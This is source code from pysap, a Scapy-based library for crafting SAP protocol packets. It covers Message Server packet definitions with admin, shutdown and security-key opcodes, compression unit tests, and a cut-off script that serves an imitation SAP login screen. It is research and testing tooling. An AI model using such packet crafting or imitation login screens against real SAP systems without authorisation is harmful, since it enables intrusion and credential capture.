    """SAP Message Server Administration Record packet

    Packet for Message Server administration records. Each administration
    package has a variable number of records, each one specifies an operation
    to execute.
    """
    name = "SAP Message Server Adm Record"
    fields_desc = [
        ByteEnumKeysField("opcode", 0x00, ms_adm_opcode_values),
        ByteField("serial_number", 0x00),
        ByteField("executed", 0x00),
        ByteField("errorno", 0x00),  # TODO: Look for error names
        ConditionalField(StrFixedLenField("record", None, 100), lambda pkt:pkt.opcode not in [0x01, 0x15, 0x2e]),

        # TODO: Add more opcodes fields

        # AD_PROFILE and AD_SHARED_PARAMETER fields
        ConditionalField(StrNullFixedLenPaddedField("parameter", "", 100), lambda pkt:pkt.opcode in [0x01, 0x2e]),

        # AD_RZL_STRG opcode
        ConditionalField(ByteEnumKeysField("rzl_strg_type", 1, ms_adm_rzl_strg_type_values), lambda pkt:pkt.opcode in [0x15]),
        ConditionalField(ByteField("rzl_strg_name_length", 0), lambda pkt:pkt.opcode in [0x15]),
        ConditionalField(ByteField("rzl_strg_value_offset", 0), lambda pkt:pkt.opcode in [0x15]),
        ConditionalField(ByteField("rzl_strg_value_length", 0), lambda pkt:pkt.opcode in [0x15]),
        ConditionalField(StrFixedLenField("rzl_strg_name", None, 20), lambda pkt:pkt.opcode in [0x15]),
        ConditionalField(IntField("rzl_strg_integer0", 0), lambda pkt:pkt.opcode in [0x15] and pkt.rzl_strg_type in [11, 15, 21, 31, 41, 51]),
        ConditionalField(IntField("rzl_strg_integer1", 0), lambda pkt:pkt.opcode in [0x15] and pkt.rzl_strg_type in [11, 15, 21, 31, 41, 51]),
        ConditionalField(IntField("rzl_strg_integer2", 0), lambda pkt:pkt.opcode in [0x15] and pkt.rzl_strg_type in [11, 15, 21, 31, 41, 51]),
        ConditionalField(IntField("rzl_strg_integer3", 0), lambda pkt:pkt.opcode in [0x15] and pkt.rzl_strg_type in [11, 15, 21, 31, 41, 51]),
        ConditionalField(IntField("rzl_strg_integer4", 0), lambda pkt:pkt.opcode in [0x15] and pkt.rzl_strg_type in [11, 15, 21, 31, 41, 51]),
        ConditionalField(IntField("rzl_strg_integer5", 0), lambda pkt:pkt.opcode in [0x15] and pkt.rzl_strg_type in [11, 15, 21, 31, 41, 51]),
        ConditionalField(IntField("rzl_strg_integer6", 0), lambda pkt:pkt.opcode in [0x15] and pkt.rzl_strg_type in [11, 15, 21, 31, 41, 51]),
        ConditionalField(IntField("rzl_strg_integer7", 0), lambda pkt:pkt.opcode in [0x15] and pkt.rzl_strg_type in [11, 15, 21, 31, 41, 51]),
        ConditionalField(IntField("rzl_strg_integer8", 0), lambda pkt:pkt.opcode in [0x15] and pkt.rzl_strg_type in [11, 15, 21, 31, 41, 51]),
        ConditionalField(IntField("rzl_strg_integer9", 0), lambda pkt:pkt.opcode in [0x15] and pkt.rzl_strg_type in [11, 15, 21, 31, 41, 51]),
        ConditionalField(StrFixedLenField("rzl_strg_value", None, 40), lambda pkt:pkt.opcode in [0x15] and pkt.rzl_strg_type not in [11, 15, 21, 31, 41, 51]),
        ConditionalField(StrFixedLenField("rzl_strg_padd2", None, 36), lambda pkt:pkt.opcode in [0x15]),
    ]


class SAPMSClient1(PacketNoPadded):
    """SAP Message Server Client packet version 1

    Packet that contains information about a client of the Message Server
    service. This packet is for version 1, which has been seen only on old
    releases (SAP NW 2004s).
    """
    name = "SAP Message Server Client version 1"
    fields_desc = [
        StrFixedLenField("client", None, 20),
        StrFixedLenField("host", None, 20),
        StrFixedLenField("service", None, 20),
        FlagsField("msgtype", 0, 8, ["ICM", "ATP", "UP2", "SPO", "BTC", "ENQ", "UPD", "DIA"]),
        IPField("hostaddrv4", "0.0.0.0"),
        ShortField("servno", 0x00),
    ]


class SAPMSClient2(PacketNoPadded):
    """SAP Message Server Client packet version 2

    Packet that contains information about a client of the Message Server
    service. This packet is for version 2, which has been seen only on old
    releases (SAP NW 2004s).
    """
    name = "SAP Message Server Client version 2"
    fields_desc = [
        StrFixedLenField("client", None, 40),
        StrFixedLenField("host", None, 32),
        StrFixedLenField("service", None, 20),
        FlagsField("msgtype", 0, 8, ["ICM", "ATP", "UP2", "SPO", "BTC", "ENQ", "UPD", "DIA"]),
        IPField("hostaddrv4", "0.0.0.0"),
        ShortField("servno", 0x00),
        ByteEnumKeysField("status", 0x00, ms_client_status_values),
        ByteField("nitrace", 0x00),
        StrFixedLenField("padd", None, 14),
    ]


class SAPMSClient3(Packet):
    """SAP Message Server Client packet version 3

    Packet that contains information about a client of the Message Server
    service. This packet is for version 3.
    """
    name = "SAP Message Server Client version 3"
    fields_desc = [
        StrFixedLenField("client", None, 40),
        StrFixedLenField("host", None, 64),
        StrFixedLenField("service", None, 20),
        FlagsField("msgtype", 0, 8, ["ICM", "ATP", "UP2", "SPO", "BTC", "ENQ", "UPD", "DIA"]),
        IP6Field("hostaddrv6", "::1"),
        IPField("hostaddrv4", "0.0.0.0"),
        ShortField("servno", 0x00),
        ByteEnumKeysField("status", 0x00, ms_client_status_values),
        ByteField("nitrace", 0x00),
        ByteField("padd", 0),
    ]


class SAPMSClient4(PacketNoPadded):
    """SAP Message Server Client packet version 4

    Packet that contains information about a client of the Message Server
    service. This packet is for version 4.
    """
    name = "SAP Message Server Client version 4"
    fields_desc = [
        StrFixedLenField("client", None, 40),
        StrFixedLenField("host", None, 64),
        StrFixedLenField("service", None, 20),
        FlagsField("msgtype", 0, 8, ["ICM", "ATP", "UP2", "SPO", "BTC", "ENQ", "UPD", "DIA"]),
        IP6Field("hostaddrv6", "::1"),
        IPField("hostaddrv4", "0.0.0.0"),
        ShortField("servno", 0x00),
        ByteEnumKeysField("status", 0x00, ms_client_status_values),
        ByteField("nitrace", 0x00),
        IntField("sys_service", 0x00),
        StrFixedLenField("padd", None, 7),
    ]


class SAPMSStat3(PacketNoPadded):
    """SAP Message Server Statistics version 3

    Packet that contains statistics information of the Message Server service.
    This packet is for version 3.
    """
    # TODO: The fields on this packet are not correctly defined
    name = "SAP Message Server Statistics version 3"
    fields_desc = [
        ByteField("active", 0),
        ByteField("version", 0),
        ShortField("unused1", 0),
        IntField("no_requests", 0),
        StrFixedLenField("no_requests_padd", "", 12),
        IntField("no_error", 0),
        StrFixedLenField("no_error_padd", "", 4),
        IntField("no_login", 0),
        StrFixedLenField("no_login_padd", "", 4),
        IntField("no_logout", 0),
        StrFixedLenField("no_logout_padd", "", 4),
        IntField("no_send_by_name", 0),
        StrFixedLenField("no_send_by_name_padd", "", 4),
        IntField("no_send_by_type", 0),
        StrFixedLenField("no_send_by_type_padd", "", 4),
        IntField("no_adm_messages", 0),
        StrFixedLenField("no_adm_messages_padd", "", 4),
        IntField("no_adms", 0),
        StrFixedLenField("no_amds_padd", "", 4),
        StrFixedLenField("no_adm_type", "", 648),
        IntField("no_mod_types", 0),
        StrFixedLenField("no_mod_types_padd", "", 4),
        IntField("no_opcodes_rcvd", 0),
        StrFixedLenField("no_opcodes_rcvd_padd", "", 4),
        IntField("no_opcodes_send", 0),
        StrFixedLenField("no_opcodes_send_padd", "", 4),
        IntField("no_opcodes", 0),
        StrFixedLenField("no_opcode_type", "", 408),
        IntField("no_keepalive_send", 0),
        StrFixedLenField("no_keepalive_send_padd", "", 4),
        IntField("no_keepalive_rcvd", 0),
        StrFixedLenField("no_keepalive_rcvd_padd", "", 4),
        IntField("no_keepalive_disc", 0),
        StrFixedLenField("no_keepalive_disc_padd", "", 4),
        IntField("no_bytes_read", 0),
        StrFixedLenField("no_bytes_read_padd", "", 12),
        IntField("no_bytes_written", 0),
        StrFixedLenField("no_bytes_written_padd", "", 12),
        IntField("no_clients", 0),
        StrFixedLenField("sta_time", "", 30),
        StrFixedLenField("act_time", "", 30),
    ]


class SAPMSCounter(PacketNoPadded):
    """SAP Message Server Counter packet.

    Packet containing information about a Counter.
    """
    name = "SAP Message Server Counter"
    fields_desc = [
        StrFixedLenField("uuid", "", 40),
        IntField("count", 0),
        IntField("no", 0),
    ]


class SAPMSLogon(PacketNoPadded):
    """SAP Message Server Logon packet.

    Packet containing logon data.
    """
    name = "SAP Message Server Logon"
    fields_desc = [
        ShortEnumKeysField("type", 0, ms_logon_type_values),
        ShortField("port", 0),
        IPField("address", "0.0.0.0"),
        FieldLenField("logonname_length", None, length_of="logonname", fmt="!H"),  # <= 80h bytes
        StrLenField("logonname", "", length_from=lambda pkt:pkt.logonname_length),
        FieldLenField("prot_length", None, length_of="prot", fmt="!H"),  # <= 80h bytes
        StrLenField("prot", "", length_from=lambda pkt:pkt.prot_length),
        FieldLenField("host_length", None, length_of="host", fmt="!H"),  # <= 100h bytes
        StrLenField("host", "", length_from=lambda pkt:pkt.host_length),
        FieldLenField("misc_length", None, length_of="misc", fmt="!H"),  # <= 100h bytes
        StrLenField("misc", "", length_from=lambda pkt:pkt.misc_length),
        FieldLenField("address6_length", 16, length_of="address6", fmt="!H"),  # == 16 bytes
        IP6Field("address6", "::"),
    ]


class SAPMSProperty(PacketNoPadded):
    """SAP Message Server Property packet.

    Packet containing information about properties.
    """
    name = "SAP Message Server Property"
    fields_desc = [
        StrNullFixedLenField("client", None, 39),
        IntEnumField("id", 0x00, ms_property_id_values),

        # MS_PROPERTY_VHOST
        ConditionalField(ShortEnumKeysField("logon", 0, ms_logon_type_values), lambda pkt:pkt.id in [0x02]),

        # MS_PROPERTY_IPADR
        ConditionalField(IPField("address", "0.0.0.0"), lambda pkt:pkt.id in [0x03]),
        ConditionalField(IP6Field("address6", "::"), lambda pkt:pkt.id in [0x03]),

        # MS_PROPERTY_PARAM
        ConditionalField(StrNullField("param", ""), lambda pkt:pkt.id in [0x04]),
        ConditionalField(StrNullField("value", ""), lambda pkt:pkt.id in [0x04]),

        # MS_PROPERTY_SERVICE
        ConditionalField(ShortField("service", 0), lambda pkt:pkt.id in [0x05]),

        # Release Information fields
        ConditionalField(StrNullFixedLenField("release", "720", length=9), lambda pkt:pkt.id in [0x07]),
        ConditionalField(IntField("patchno", 0), lambda pkt:pkt.id in [0x07]),
        ConditionalField(IntField("supplvl", 0), lambda pkt:pkt.id in [0x07]),
        ConditionalField(IntField("platform", 0), lambda pkt:pkt.id in [0x07]),
    ]


class SAPMS(Packet):
    """SAP Message Server packet

    This packet is used for the Message Server protocol.
    """
    name = "SAP Message Server"
    fields_desc = [
        StrFixedLenField("eyecatcher", "**MESSAGE**\x00", 12),
        ByteField("version", 0x04),
        ByteEnumKeysField("errorno", 0x00, ms_errorno_values),
        StrFixedLenField("toname", " " * 40, 40),
        FlagsField("msgtype", 0, 8, ["DIA", "UPD", "ENQ", "BTC", "SPO", "UP2", "ATP", "ICM"]),
        StrFixedLenField("reserved", "\x00" * 3, 3),
        StrFixedLenField("key", "\x00" * 8, 8),
        ByteEnumKeysField("flag", 0x01, ms_flag_values),
        ByteEnumKeysField("iflag", 0x01, ms_iflag_values),
        StrFixedLenField("fromname", " " * 40, 40),
        ShortField("padd", 0x0000),

        # OpCode fields
        ConditionalField(ByteEnumKeysField("opcode", 0x00, ms_opcode_values), lambda pkt:pkt.iflag in [0x00, 0x01]),
        ConditionalField(ByteEnumKeysField("opcode_error", 0x00, ms_opcode_error_values), lambda pkt:pkt.iflag in [0x00, 0x01]),
        ConditionalField(ByteField("opcode_version", 0x01), lambda pkt:pkt.iflag in [0x00, 0x01]),
        ConditionalField(ByteField("opcode_charset", 0x03), lambda pkt:pkt.iflag in [0x00, 0x01]),
        ConditionalField(StrField("opcode_value", ""), lambda pkt:pkt.iflag in [0x00, 0x01] and pkt.opcode not in [0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x11, 0x1c, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2f, 0x43, 0x44, 0x45, 0x46, 0x47, 0x4a]),

        # Adm OpCode fields
        ConditionalField(StrFixedLenField("adm_eyecatcher", "AD-EYECATCH\x00", 12), lambda pkt:pkt.iflag == 0x05),
        ConditionalField(ByteField("adm_version", 0x01), lambda pkt:pkt.iflag == 0x05),
        ConditionalField(ByteEnumKeysField("adm_type", 0x01, ms_adm_type_values), lambda pkt:pkt.iflag == 0x05),
        ConditionalField(IntToStrField("adm_recsize", 104, 11), lambda pkt:pkt.iflag == 0x05),
        ConditionalField(IntToStrField("adm_recno", 1, 11), lambda pkt:pkt.iflag == 0x05),
        ConditionalField(PacketListField("adm_records", None, SAPMSAdmRecord), lambda pkt:pkt.iflag == 0x05),

        # Server List fields
        ConditionalField(PacketListField("clients", None, SAPMSClient1), lambda pkt:pkt.opcode in [0x02, 0x03, 0x04, 0x05] and pkt.opcode_version == 0x01),
        ConditionalField(PacketListField("clients", None, SAPMSClient2), lambda pkt:pkt.opcode in [0x02, 0x03, 0x04, 0x05] and pkt.opcode_version == 0x02),
        ConditionalField(PacketListField("clients", None, SAPMSClient3), lambda pkt:pkt.opcode in [0x02, 0x03, 0x04, 0x05] and pkt.opcode_version == 0x03),
        ConditionalField(PacketListField("clients", None, SAPMSClient4), lambda pkt:pkt.opcode in [0x02, 0x03, 0x04, 0x05] and pkt.opcode_version == 0x04),

        # Change IP fields
        ConditionalField(IPField("change_ip_addressv4", "0.0.0.0"), lambda pkt:pkt.opcode == 0x06),
        ConditionalField(IP6Field("change_ip_addressv6", "::"), lambda pkt:pkt.opcode == 0x06 and pkt.opcode_version == 0x02),

        # Get/Set Text fields
        ConditionalField(StrFixedLenField("text_name", "", 40), lambda pkt:pkt.opcode in [0x22, 0x23]),
        ConditionalField(FieldLenField("text_length", None, length_of="text_value", fmt="!I"), lambda pkt:pkt.opcode in [0x22, 0x23]),
        ConditionalField(StrFixedLenField("text_value", "", length_from=lambda pkt:pkt.text_length or 80), lambda pkt:pkt.opcode in [0x22, 0x23]),

        # Counter fields
        ConditionalField(PacketField("counter", None, SAPMSCounter), lambda pkt:pkt.opcode in [0x24, 0x25, 0x26, 0x27, 0x28, 0x29]),
        ConditionalField(PacketListField("counters", None, SAPMSCounter), lambda pkt:pkt.opcode in [0x2a]),

        # Security Key 1 fields
        ConditionalField(StrFixedLenField("security_name", None, 40), lambda pkt:pkt.opcode in [0x07, 0x08]),
        ConditionalField(StrFixedLenField("security_key", None, 256), lambda pkt:pkt.opcode in [0x07, 0x08]),

        # Security Key 2 fields
        ConditionalField(IPField("security2_addressv4", "0.0.0.0"), lambda pkt:pkt.opcode == 0x09),
        ConditionalField(ShortField("security2_port", 0), lambda pkt:pkt.opcode == 0x09),
        ConditionalField(StrFixedLenField("security2_key", None, 256), lambda pkt:pkt.opcode == 0x09),
        ConditionalField(IP6Field("security2_addressv6", "::"), lambda pkt:pkt.opcode == 0x09),

        # Hardware ID field
        ConditionalField(StrNullFixedLenField("hwid", "", length=99), lambda pkt:pkt.opcode == 0x0a),

        # Statistics
        ConditionalField(PacketField("stats", None, SAPMSStat3), lambda pkt:pkt.opcode == 0x11 and pkt.flag == 0x03),

        # Codepage
        ConditionalField(IntField("codepage", 0), lambda pkt:pkt.opcode == 0x1c and pkt.flag == 0x03),

        # Dump Info Request fields
        ConditionalField(ByteField("dump_dest", 0x02), lambda pkt:pkt.opcode == 0x1E and pkt.flag == 0x02),
        ConditionalField(StrFixedLenField("dump_filler", "\x00\x00\x00", 3), lambda pkt:pkt.opcode == 0x1E and pkt.flag == 0x02),
        ConditionalField(ShortField("dump_index", 0x00), lambda pkt:pkt.opcode == 0x1E and pkt.flag == 0x02),
        ConditionalField(ShortEnumKeysField("dump_command", 0x01, ms_dump_command_values), lambda pkt:pkt.opcode == 0x1E and pkt.flag == 0x02),
        ConditionalField(StrFixedLenField("dump_name", "\x00" * 40, 40), lambda pkt:pkt.opcode == 0x1E and pkt.flag == 0x02),

        # File Reload fields
        ConditionalField(ByteEnumKeysField("file_reload", 0, ms_file_reload_values), lambda pkt:pkt.opcode == 0x1f),
        ConditionalField(StrFixedLenField("file_filler", "\x00\x00\x00", 3), lambda pkt:pkt.opcode == 0x1f),

        # Get/Set/Del Logon fields
        ConditionalField(PacketField("logon", None, SAPMSLogon), lambda pkt:pkt.opcode in [0x2b, 0x2c, 0x2d]),

        # Server Disconnect/Shutdown fields
        ConditionalField(PacketField("shutdown_client", None, SAPMSClient3), lambda pkt:pkt.opcode in [0x2e, 0x2f, 0x30, 0x4a]),
        ConditionalField(FieldLenField("shutdown_reason_length", None, length_of="shutdown_reason", fmt="!H"), lambda pkt:pkt.opcode in [0x2e, 0x2f, 0x30, 0x4a]),
        ConditionalField(StrLenField("shutdown_reason", "", length_from=lambda pkt:pkt.shutdown_reason_length), lambda pkt:pkt.opcode in [0x2e, 0x2f, 0x30, 0x4a]),

        # Get/Set Property fields
        ConditionalField(PacketField("property", None, SAPMSProperty), lambda pkt:pkt.opcode in [0x43, 0x44, 0x45]),

        # IP/Port to name fields
        ConditionalField(IPField("ip_to_name_address4", "0.0.0.0"), lambda pkt:pkt.opcode == 0x46 and pkt.opcode_version == 0x01),
        ConditionalField(IP6Field("ip_to_name_address6", "::"), lambda pkt:pkt.opcode == 0x46 and pkt.opcode_version == 0x02),
        ConditionalField(ShortField("ip_to_name_port", 0), lambda pkt:pkt.opcode == 0x46),
        ConditionalField(FieldLenField("ip_to_name_length", None, length_of="ip_to_name", fmt="!I"), lambda pkt:pkt.opcode == 0x46),
        ConditionalField(StrLenField("ip_to_name", "", length_from=lambda pkt:pkt.logonname_length), lambda pkt:pkt.opcode == 0x46),

        # Check ACL fields
        ConditionalField(ShortField("error_code", 0), lambda pkt:pkt.opcode == 0x47),
        ConditionalField(StrFixedLenField("acl", "", 46), lambda pkt:pkt.opcode == 0x47),
    ]


# Bind SAP NI with the MS ports (both internal & external)
bind_layers(TCP, SAPNI, dport=3600)
bind_layers(TCP, SAPNI, dport=3900)



# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import unittest
# Custom imports
from tests.utils import read_data_file


class PySAPCompressTest(unittest.TestCase):

    test_string_plain = "TEST" * 70
    test_string_compr_lzc = '\x18\x01\x00\x00\x11\x1f\x9d\x8dT\x8aL\xa1\x12p`A\x82\x02\x11\x1aLx\xb0!\xc3\x87\x0b#*\x9c\xe8PbE\x8a\x101Z\xccx\xb1#\xc7\x8f\x1bCj\x1c\xe9QdI\x92 Q\x9aLy\xf2 '
    test_string_compr_lzh = '\x18\x01\x00\x00\x12\x1f\x9d\x02]\x88kpH\xc8(\xc6\xc0\x00\x00'

    def test_import(self):
        """Test import of the pysapcompress library"""
        try:
            import pysapcompress  # @UnusedImport
        except ImportError as e:
            self.Fail(str(e))

    def test_compress_input(self):
        """Test compress function input"""
        from pysapcompress import compress, CompressError
        self.assertRaisesRegexp(CompressError, "invalid input length", compress, "")
        self.assertRaisesRegexp(CompressError, "unknown algorithm", compress, "TestString", algorithm=999)

    def test_decompress_input(self):
        """Test decompress function input"""
        from pysapcompress import decompress, DecompressError
        self.assertRaisesRegexp(DecompressError, "invalid input length", decompress, "", 1)
        self.assertRaisesRegexp(DecompressError, "input not compressed", decompress, "AAAAAAAA", 1)
        self.assertRaisesRegexp(DecompressError, "unknown algorithm", decompress, "\x0f\x00\x00\x00\xff\x1f\x9d\x00\x00\x00\x00", 1)

    def test_lzc(self):
        """Test compression and decompression using LZC algorithm"""
        from pysapcompress import compress, decompress, ALG_LZC
        status, out_length_compressed, out_compressed = compress(self.test_string_plain, ALG_LZC)

        self.assertTrue(status)
        self.assertEqual(out_length_compressed, len(out_compressed))
        self.assertEqual(out_length_compressed, len(self.test_string_compr_lzc))
        self.assertEqual(out_compressed, self.test_string_compr_lzc)

        status, out_length_decompressed, out_decompressed = decompress(out_compressed, len(self.test_string_plain))

        self.assertTrue(status)
        self.assertEqual(out_length_decompressed, len(out_decompressed))
        self.assertEqual(out_length_decompressed, len(self.test_string_plain))
        self.assertEqual(out_decompressed, self.test_string_plain)

    def test_lzh(self):
        """Test compression and decompression using LZH algorithm"""
        from pysapcompress import compress, decompress, ALG_LZH
        status, out_length_compressed, out_compressed = compress(self.test_string_plain, ALG_LZH)

        self.assertTrue(status)
        self.assertEqual(out_length_compressed, len(out_compressed))
        # LZH compression has a random component, so the only check here is
        # in regards to the length and to see if if decompress back to the
        # original string

        status, out_length_decompressed, out_decompressed = decompress(out_compressed, len(self.test_string_plain))

        self.assertTrue(status)
        self.assertEqual(out_length_decompressed, len(out_decompressed))
        self.assertEqual(out_length_decompressed, len(self.test_string_plain))
        self.assertEqual(out_decompressed, self.test_string_plain)

    def test_lzh_decompress(self):
        """Test decompression using LZH algorithm"""
        from pysapcompress import decompress
        status, out_length_decompressed, out_decompressed = decompress(self.test_string_compr_lzh, len(self.test_string_plain))

        self.assertTrue(status)
        self.assertEqual(out_length_decompressed, len(out_decompressed))
        self.assertEqual(out_length_decompressed, len(self.test_string_plain))
        self.assertEqual(out_decompressed, self.test_string_plain)

    def test_login_screen(self):
        """Test (de)compression of a login screen packet. The result is
        compared with data obtained from SAP GUI."""
        from pysapcompress import compress, decompress, ALG_LZH
        login_screen_compressed = read_data_file('nw_703_login_screen_compressed.data')
        login_screen_decompressed = read_data_file('nw_703_login_screen_decompressed.data')

        status, out_length, decompressed = decompress(login_screen_compressed, len(login_screen_decompressed))

        self.assertTrue(status)
        self.assertEqual(out_length, len(login_screen_decompressed))
        self.assertEqual(decompressed, login_screen_decompressed)

        status, out_length, compressed = compress(decompressed, ALG_LZH)

        self.assertTrue(status)
        self.assertEqual(out_length, len(login_screen_compressed))

        # As we can't compare with the compressed data (LZH randomness),
        # decompress again and check with the plain text

        status, out_length, decompressed = decompress(compressed, len(login_screen_decompressed))

        self.assertTrue(status)
        self.assertEqual(out_length, len(login_screen_decompressed))
        self.assertEqual(decompressed, login_screen_decompressed)

    def test_login(self):
        """Test (de)compression of a login packet. The result is
        compared with data obtained from SAP GUI."""
        from pysapcompress import compress, decompress, ALG_LZH
        login_compressed = read_data_file('sapgui_730_login_compressed.data')
        login_decompressed = read_data_file('sapgui_730_login_decompressed.data')

        status, out_length, decompressed = decompress(login_compressed, len(login_decompressed))

        self.assertTrue(status)
        self.assertEqual(out_length, len(login_decompressed))
        self.assertEqual(decompressed, login_decompressed)

        status, out_length, compressed = compress(decompressed, ALG_LZH)

        self.assertTrue(status)
        self.assertEqual(out_length, len(login_compressed))

        # As we can't compare with the compressed data (LZH randomness),
        # decompress again and check with the plain text

        status, out_length, decompressed = decompress(compressed, len(login_decompressed))

        self.assertTrue(status)
        self.assertEqual(out_length, len(login_decompressed))
        self.assertEqual(decompressed, login_decompressed)


def suite():
    loader = unittest.TestLoader()
    suite = unittest.TestSuite()
    suite.addTest(loader.loadTestsFromTestCase(PySAPCompressTest))
    return suite


if __name__ == "__main__":
    unittest.TextTestRunner(verbosity=2).run(suite())



#!/usr/bin/env python
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import logging
from socket import error
from optparse import OptionParser, OptionGroup
# External imports
from scapy.config import conf
from scapy.packet import bind_layers
# Custom imports
import pysap
from pysap.SAPDiagItems import *
from pysap.SAPDiag import SAPDiag, SAPDiagDP
from pysap.SAPNI import (SAPNI, SAPNIClient, SAPNIServerHandler,
                         SAPNIServerThreaded)


# Bind the SAPDiag layer
bind_layers(SAPNI, SAPDiagDP,)
bind_layers(SAPNI, SAPDiag,)
bind_layers(SAPDiagDP, SAPDiag,)
bind_layers(SAPDiag, SAPDiagItem,)
bind_layers(SAPDiagItem, SAPDiagItem,)


# Set the verbosity to 0
conf.verb = 0


class SAPDiagClient(SAPNIClient):
    terminal = None
    init = False

    def __init__(self, terminal=None, init=False):
        self.terminal = terminal
        self.init = init

    def __str__(self):
        return "SAP Diag Client: Terminal=%s Init=%s" % (self.terminal, self.init)


class SAPDiagServerHandler(SAPNIServerHandler):

    def __init__(self, request, client_address, server):
        self.hostname = server.options.server_hostname
        self.client = server.options.server_client
        self.sid = server.options.server_sid
        self.session_title = server.options.server_session_title
        SAPNIServerHandler.__init__(self, request, client_address, server)

    def make_login_screen(self):
        return [
            SAPDiagItem(item_value=support_data_sapnw_702, item_type=16, item_id=6, item_sid=17),
            SAPDiagItem(item_value='A38A17E15C46F1F4B43C000C297D2G11', item_type=16, item_id=6, item_sid=33),
            SAPDiagItem(item_value='\x01\xa3\x8a\x17\xe1\\F\xf1\xf6\xb4<\x00\x0c)}.\x11\x01', item_type=16, item_id=6, item_sid=31),
            SAPDiagItem(item_value=self.sid, item_type=16, item_id=6, item_sid=2),
            SAPDiagItem(item_value=self.client, item_type=16, item_id=6, item_sid=12),
            SAPDiagItem(item_value=self.hostname, item_type=16, item_id=6, item_sid=3),
            SAPDiagItem(item_value='TRADESHOW\x00', item_type=16, item_id=6, item_sid=37),
            SAPDiagItem(item_value='702\x007200\x0070\x00', item_type=16, item_id=6, item_sid=41),
            SAPDiagItem(item_value='S000                                ', item_type=16, item_id=6, item_sid=7),
            SAPDiagItem(item_value='\x00\x00\x00\x00\x00\x00!\x00\x00\x00\x00\x00\x00\x00\x16T', item_type=1),
            SAPDiagItem(item_value=SAPDiagAreaSize(area_height=22, area_width=84, window_width=84, window_height=22), item_type=16, item_id=12, item_sid=7),
            SAPDiagItem(item_value='SAP R/3 (1) %s     ' % self.sid, item_type=16, item_id=12, item_sid=10),
            SAPDiagItem(item_value='SAPMSYST                                ', item_type=16, item_id=6, item_sid=15),
            SAPDiagItem(item_value='SAPMSYST                                ', item_type=16, item_id=6, item_sid=13),
            SAPDiagItem(item_value='0020                ', item_type=16, item_id=6, item_sid=16),
            SAPDiagItem(item_value='0020', item_type=16, item_id=6, item_sid=14),
            SAPDiagItem(item_value=SAPDiagMenuEntries(entries=[SAPDiagMenuEntry(accelerator='D', text=self.session_title, position_1=1, flag_TERM_VKEY=1L, return_code_1=1, flag_TERM_SEL=1L, length=24 + len(self.session_title)),
                                                               ]), item_type=18, item_id=11, item_sid=1),
            SAPDiagItem(item_value=SAPDiagMenuEntries(entries=[SAPDiagMenuEntry(accelerator='', text='New password', virtual_key=5, return_code_1=5, info='New password', flag_TERM_SEL=1L, length=47),
                                                               ]), item_type=18, item_id=11, item_sid=3),
            SAPDiagItem(item_value=SAPDiagMenuEntries(entries=[SAPDiagMenuEntry(accelerator='', text='New password', virtual_key=5, position_1=1, flag_TERM_SEL=1L, length=35),
                                                               SAPDiagMenuEntry(accelerator='', text='Log off', virtual_key=15, position_1=2, return_code_1=1, flag_TERM_SEL=1L, length=30)
                                                               ]), item_type=18, item_id=11, item_sid=4),
            SAPDiagItem(item_value=self.session_title, item_type=16, item_id=12, item_sid=9),
            SAPDiagItem(item_value=SAPDiagDyntAtom(items=[SAPDiagDyntAtomItem(field2_text='Client            ', field2_maxnrchars=18, dlg_flag_2=2, atom_length=37, etype=132, attr_DIAG_BSD_PROTECTED=1L, field2_mlen=18, field2_dlen=18, attr_DIAG_BSD_PROPFONT=1L, block=1, col=1),
                                                          SAPDiagDyntAtomItem(dlg_flag_2=2, atom_length=24, name_text='RSYST-MANDT', etype=114, attr_DIAG_BSD_PROTECTED=1L, attr_DIAG_BSD_PROPFONT=1L, block=1, col=1),
                                                          SAPDiagDyntAtomItem(field2_text=self.client, attr_DIAG_BSD_YES3D=1L, field2_maxnrchars=3, atom_length=22, etype=130, field2_mlen=3, field2_dlen=3, block=1, col=20),
                                                          SAPDiagDyntAtomItem(attr_DIAG_BSD_YES3D=1L, atom_length=24, name_text='RSYST-MANDT', etype=114, block=1, col=20),
                                                          SAPDiagDyntAtomItem(attr_DIAG_BSD_YES3D=1L, atom_length=79, xmlprop_text='<Propertybag><DefaultTooltip>Client</DefaultTooltip></Propertybag>', etype=120, block=1, col=20),
                                                          SAPDiagDyntAtomItem(field2_text='User              ', field2_maxnrchars=18, row=2, dlg_flag_2=3, atom_length=37, etype=132, attr_DIAG_BSD_PROTECTED=1L, field2_mlen=18, field2_dlen=18, attr_DIAG_BSD_PROPFONT=1L, block=1, col=1),
                                                          SAPDiagDyntAtomItem(row=2, dlg_flag_2=3, atom_length=24, name_text='RSYST-BNAME', etype=114, attr_DIAG_BSD_PROTECTED=1L, attr_DIAG_BSD_PROPFONT=1L, block=1, col=1),
                                                          SAPDiagDyntAtomItem(field2_text='?           ', attr_DIAG_BSD_YES3D=1L, field2_maxnrchars=12, row=2, dlg_flag_2=1, atom_length=31, etype=130, field2_mlen=12, field2_dlen=12, block=1, col=20),
                                                          SAPDiagDyntAtomItem(attr_DIAG_BSD_YES3D=1L, row=2, dlg_flag_2=1, atom_length=24, name_text='RSYST-BNAME', etype=114, block=1, col=20),
                                                          SAPDiagDyntAtomItem(attr_DIAG_BSD_YES3D=1L, row=2, dlg_flag_2=1, atom_length=82, xmlprop_text='<Propertybag><DefaultTooltip>User name</DefaultTooltip></Propertybag>', etype=120, block=1, col=20),
